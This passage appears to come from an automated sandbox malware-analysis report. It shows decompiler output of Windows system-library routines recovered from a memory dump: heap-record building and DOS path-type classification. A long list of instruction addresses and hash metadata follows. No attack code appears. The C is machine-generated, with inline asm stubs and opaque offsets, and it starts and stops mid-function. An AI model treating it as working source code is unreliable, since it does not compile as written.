												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E01326DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0132F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0132F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0132F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0132FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0132FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0132F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0132F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E013B4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0133D130(_t427, _t494, _t511);
				}
			}










































































                            0x013b5ba5
                            0x013b5baa
                            0x013b5baf
                            0x013b5bb4
                            0x013b5bb6
                            0x013b5bbc
                            0x013b5bbe
                            0x013b5bc4
                            0x013b5bcd
                            0x013b5bd3
                            0x013b5bd6
                            0x013b5bdc
                            0x013b5be0
                            0x013b5be3
                            0x013b5beb
                            0x013b5bf2
                            0x013b5bf8
                            0x013b5bfe
                            0x013b5c04
                            0x013b5c0e
                            0x013b5c18
                            0x013b5c1f
                            0x013b5c25
                            0x013b5c2a
                            0x013b5c2c
                            0x013b5c32
                            0x013b5c3a
                            0x013b5c3f
                            0x013b5c42
                            0x013b5c48
                            0x013b5c5b
                            0x013b5c5b
                            0x013b5c2c
                            0x013b5cb7
                            0x013b5cb9
                            0x013b5cbf
                            0x013b5cc2
                            0x013b5cca
                            0x013b5ccb
                            0x013b5ccb
                            0x013b5cd1
                            0x013b5cd7
                            0x013b5cda
                            0x013b5ce1
                            0x013b5ce4
                            0x013b5ce7
                            0x013b5ced
                            0x013b5cf3
                            0x013b5cf9
                            0x013b5cff
                            0x013b5d08
                            0x013b5d0a
                            0x013b5d0e
                            0x013b5d10
                            0x00000000
                            0x00000000
                            0x013b5d16
                            0x013b5d1a
                            0x00000000
                            0x00000000
                            0x013b5d20
                            0x013b5d22
                            0x013b5d25
                            0x013b5d2f
                            0x013b5d2f
                            0x013b5d33
                            0x013b5d3d
                            0x013b5d49
                            0x013b5d4b
                            0x00000000
                            0x00000000
                            0x013b5d5a
                            0x013b5d5d
                            0x013b5d60
                            0x00000000
                            0x00000000
                            0x013b5d66
                            0x013b5d69
                            0x00000000
                            0x00000000
                            0x013b5d6f
                            0x013b5d6f
                            0x013b5d73
                            0x013b5d79
                            0x013b5d7f
                            0x013b5d86
                            0x013b5d95
                            0x013b5d98
                            0x013b5dba
                            0x013b5dcb
                            0x013b5dce
                            0x013b5dd3
                            0x013b5dd6
                            0x013b5dd8
                            0x013b5de6
                            0x013b5dec
                            0x013b5dee
                            0x013b5df1
                            0x013b5df3
                            0x013b635a
                            0x013b635a
                            0x00000000
                            0x013b635a
                            0x013b5dfe
                            0x013b5e02
                            0x013b5e05
                            0x013b5e07
                            0x013b5e10
                            0x013b5e13
                            0x013b5e1b
                            0x013b5e1c
                            0x013b5e21
                            0x013b5e22
                            0x013b5e23
                            0x013b5e25
                            0x013b5e2a
                            0x013b5e2c
                            0x013b5e2e
                            0x013b5e36
                            0x013b5e39
                            0x013b5e42
                            0x013b5e47
                            0x013b5e4d
                            0x013b5e54
                            0x013b5e54
                            0x013b5e54
                            0x013b5e2e
                            0x013b5e5c
                            0x013b5e5f
                            0x013b5e62
                            0x013b5e64
                            0x013b5e6b
                            0x013b5e70
                            0x013b5e7a
                            0x013b5e7a
                            0x013b5e7a
                            0x013b5e6b
                            0x013b5e7e
                            0x013b5e7f
                            0x013b5e7f
                            0x013b5e81
                            0x013b5e87
                            0x013b5e8b
                            0x013b5e8c
                            0x013b5e8c
                            0x013b5e8c
                            0x013b5e9a
                            0x013b5e9c
                            0x013b5ea2
                            0x013b5ea6
                            0x013b5f50
                            0x013b5f50
                            0x013b5f57
                            0x013b5f66
                            0x013b5f66
                            0x013b5f66
                            0x013b5f68
                            0x013b5f6a
                            0x013b63d0
                            0x00000000
                            0x013b5f70
                            0x013b5f70
                            0x013b5f91
                            0x013b5f9c
                            0x013b5f9e
                            0x013b5fa4
                            0x013b5fa6
                            0x013b638c
                            0x013b6392
                            0x013b63a1
                            0x013b63a7
                            0x013b63af
                            0x013b63af
                            0x013b63bd
                            0x013b63d8
                            0x00000000
                            0x013b63d8
                            0x013b5fac
                            0x013b5fb2
                            0x013b5fb4
                            0x013b5fbd
                            0x013b5fc6
                            0x013b5fce
                            0x013b5fd4
                            0x013b5fdc
                            0x013b5fec
                            0x013b5fed
                            0x013b5fee
                            0x013b5fef
                            0x013b5ff9
                            0x013b5ffa
                            0x013b5ffb
                            0x013b5ffc
                            0x013b6000
                            0x013b6004
                            0x013b6012
                            0x013b6012
                            0x013b6018
                            0x013b6019
                            0x013b601a
                            0x013b601b
                            0x013b601c
                            0x013b6020
                            0x013b6059
                            0x013b605c
                            0x013b6061
                            0x013b6061
                            0x013b6022
                            0x013b6022
                            0x013b6022
                            0x013b6025
                            0x013b602a
                            0x013b602b
                            0x013b6031
                            0x013b6037
                            0x013b6038
                            0x013b603e
                            0x013b6048
                            0x013b6049
                            0x013b604a
                            0x013b604b
                            0x013b604c
                            0x013b604d
                            0x013b6053
                            0x013b6054
                            0x013b6054
                            0x013b6062
                            0x013b6065
                            0x013b6067
                            0x013b606a
                            0x013b6070
                            0x013b6075
                            0x013b6076
                            0x013b6081
                            0x013b6087
                            0x013b6095
                            0x013b6099
                            0x013b609e
                            0x013b60a4
                            0x013b60ae
                            0x013b60b0
                            0x013b60b3
                            0x013b60b6
                            0x013b60b8
                            0x013b60ba
                            0x013b60ba
                            0x013b60ba
                            0x013b60ba
                            0x013b60be
                            0x013b60c0
                            0x013b60c5
                            0x013b60c5
                            0x013b60c5
                            0x013b60c6
                            0x013b60cd
                            0x013b6114
                            0x013b60cf
                            0x013b60cf
                            0x013b60d4
                            0x013b60d5
                            0x013b60da
                            0x013b60db
                            0x013b60e1
                            0x013b60e2
                            0x013b60e8
                            0x013b60f8
                            0x013b60fd
                            0x013b60fe
                            0x013b6102
                            0x013b6104
                            0x013b6107
                            0x013b6109
                            0x013b610b
                            0x013b610b
                            0x013b610b
                            0x013b610b
                            0x013b610f
                            0x013b610f
                            0x013b6117
                            0x013b611a
                            0x013b611f
                            0x013b6125
                            0x013b6134
                            0x013b6139
                            0x013b613f
                            0x013b6146
                            0x013b6148
                            0x013b614b
                            0x013b614d
                            0x013b614f
                            0x013b614f
                            0x013b614f
                            0x013b614f
                            0x013b6153
                            0x013b6159
                            0x013b6159
                            0x013b615c
                            0x013b6163
                            0x013b6169
                            0x013b616c
                            0x013b6172
                            0x013b6181
                            0x013b6186
                            0x013b6187
                            0x013b618b
                            0x013b6191
                            0x013b6195
                            0x013b61a3
                            0x013b61bb
                            0x013b61c0
                            0x013b61c3
                            0x013b61cc
                            0x013b61d0
                            0x013b61dc
                            0x013b61de
                            0x013b61e1
                            0x013b61e4
                            0x013b61e6
                            0x013b61e8
                            0x013b61e8
                            0x013b61e8
                            0x013b61e8
                            0x013b61e6
                            0x013b61ec
                            0x013b61f3
                            0x013b6203
                            0x013b6209
                            0x013b620a
                            0x013b6216
                            0x013b621d
                            0x013b6227
                            0x013b6241
                            0x013b6246
                            0x013b624c
                            0x013b6257
                            0x013b6259
                            0x013b625c
                            0x013b625e
                            0x013b6260
                            0x013b6260
                            0x013b6260
                            0x013b6260
                            0x013b625e
                            0x013b6264
                            0x013b6267
                            0x013b6269
                            0x013b6315
                            0x013b6315
                            0x013b631b
                            0x013b631e
                            0x013b6324
                            0x013b6327
                            0x013b632f
                            0x013b6330
                            0x013b6333
                            0x013b633a
                            0x013b633c
                            0x013b6335
                            0x013b6335
                            0x013b6335
                            0x013b633f
                            0x013b6342
                            0x013b634c
                            0x013b6352
                            0x013b6355
                            0x013b6355
                            0x013b6359
                            0x00000000
                            0x013b626f
                            0x013b6275
                            0x013b6275
                            0x013b6278
                            0x013b627e
                            0x013b627e
                            0x013b6281
                            0x013b6287
                            0x013b628d
                            0x013b6298
                            0x013b629c
                            0x013b62a2
                            0x013b629e
                            0x013b629e
                            0x013b629e
                            0x013b62a7
                            0x013b62a7
                            0x013b62aa
                            0x013b62b0
                            0x013b62f0
                            0x013b62f0
                            0x013b62f2
                            0x013b62f8
                            0x013b62fd
                            0x013b62b2
                            0x013b62b2
                            0x013b62b2
                            0x013b62b5
                            0x013b62dd
                            0x013b62e2
                            0x013b62e5
                            0x013b62b7
                            0x013b62b8
                            0x013b62bb
                            0x013b62bd
                            0x013b62c0
                            0x013b62c4
                            0x013b62cd
                            0x013b62cd
                            0x013b62c0
                            0x013b62bb
                            0x013b62b5
                            0x013b6302
                            0x013b6303
                            0x013b6305
                            0x013b6305
                            0x013b6305
                            0x013b630c
                            0x013b630c
                            0x00000000
                            0x013b627e
                            0x013b6269
                            0x013b5eac
                            0x013b5ebb
                            0x013b5ebe
                            0x013b5ecb
                            0x013b5ecb
                            0x013b5ece
                            0x013b5ece
                            0x013b5ed4
                            0x013b5ed7
                            0x013b5ed9
                            0x013b5edb
                            0x013b5edb
                            0x013b5ee1
                            0x013b5ee1
                            0x013b5ee3
                            0x013b5f20
                            0x013b5f20
                            0x013b5ee5
                            0x013b5ee5
                            0x013b5ee5
                            0x013b5ee8
                            0x013b5f11
                            0x013b5f18
                            0x013b5eea
                            0x013b5eea
                            0x013b5eed
                            0x013b5ef2
                            0x013b5ef8
                            0x013b5efb
                            0x013b5f0a
                            0x013b5f0a
                            0x013b5eed
                            0x013b5ee8
                            0x013b5f22
                            0x013b5f28
                            0x00000000
                            0x00000000
                            0x013b5f30
                            0x013b5f31
                            0x013b5f37
                            0x013b5f3a
                            0x013b5f3d
                            0x013b5f44
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013b5f46
                            0x013b5f48
                            0x013b5f4d
                            0x00000000
                            0x013b5f4d
                            0x013b5dda
                            0x013b5ddf
                            0x00000000
                            0x013b5ddf
                            0x013b5dd8
                            0x013b5da7
                            0x013b5da9
                            0x013b5dac
                            0x013b5dae
                            0x00000000
                            0x013b5db4
                            0x013b5db4
                            0x00000000
                            0x013b5db4
                            0x013b5dae
                            0x013b5d88
                            0x013b5d8d
                            0x013b6363
                            0x013b6369
                            0x013b636a
                            0x013b6370
                            0x013b6372
                            0x013b637a
                            0x013b637b
                            0x013b637d
                            0x00000000
                            0x00000000
                            0x013b637f
                            0x013b6385
                            0x00000000
                            0x013b6385
                            0x013b5d38
                            0x013b5d3b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013b5d3b
                            0x013b5d27
                            0x013b5d29
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013b6360
                            0x00000000
                            0x013b6360
                            0x013b5c10
                            0x013b5c10
                            0x013b63da
                            0x013b63e5
                            0x013b63e5

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 559feb349b7566b55810f5882034ce60b8f1b24611ea9cf84b2bb92a18a3b6ce
                            • Instruction ID: 4bd3b9b340bade24691d6c37f6b25495a5867998af47751e3af47644746420db
                            • Opcode Fuzzy Hash: 559feb349b7566b55810f5882034ce60b8f1b24611ea9cf84b2bb92a18a3b6ce
                            • Instruction Fuzzy Hash: 7E425071901219CFDB24CF68C881BE9BBB5FF45308F1481AADA4DEB652E7349985CF50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01304120, Relevance: .4, Instructions: 444COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 92%
                            			E01304120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x13dd360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0131F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E01306E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L01304620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E01306E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M013045F8))) {
												case 0:
													_v568 = 0x12c1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x12c11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L01304620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
